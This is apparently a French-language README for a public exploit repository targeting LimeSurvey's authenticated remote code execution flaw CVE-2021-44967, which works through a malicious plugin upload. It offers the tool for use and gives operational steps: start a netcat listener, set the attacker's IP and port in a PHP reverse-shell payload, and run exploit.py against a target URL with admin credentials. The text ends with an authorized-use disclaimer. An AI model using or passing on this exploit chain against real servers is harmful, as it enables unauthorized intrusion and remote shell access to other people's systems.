
🔥 Exploit RCE automatisé pour Limesurvey (CVE-2021-44967). Chaîne d'exploitation optimisée pour l'escalade de privilèges. 🚀
Ce dépôt contient un exploit fonctionnel pour CVE-2021-44967, une vulnérabilité d'exécution de code à distance authentifiée dans LimeSurvey.
Testé et confirmé fonctionnel sur :
La vulnérabilité permet à un utilisateur authentifié avec des privilèges administratifs de télécharger un plugin malveillant. Comme LimeSurvey ne valide pas strictement le contenu du ZIP du plugin ni n'empêche l'exécution de fichiers PHP dans le répertoire des plugins, un attaquant peut obtenir une RCE en accédant directement au shell téléchargé.
config.xml mis à jour pour la compatibilité avec les versions 3.0 à 6.0 de LimeSurvey.Démarrez un écouteur netcat sur votre machine :
nc -lvnp 443
Modifiez php-rev.php et définissez votre IP locale et votre port :
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
Exemple :
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py : Le script d'automatisation principal.php-rev.php : Charge utile du shell inversé PHP.config.xml : Fichier de configuration obligatoire du plugin LimeSurvey.Cet outil est destiné UNIQUEMENT à des fins éducatives et à des tests de sécurité autorisés. Strictement destiné à une utilisation dans des environnements contrôlés et légaux (par exemple, CTF, environnements de laboratoire, ou engagements autorisés). L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test.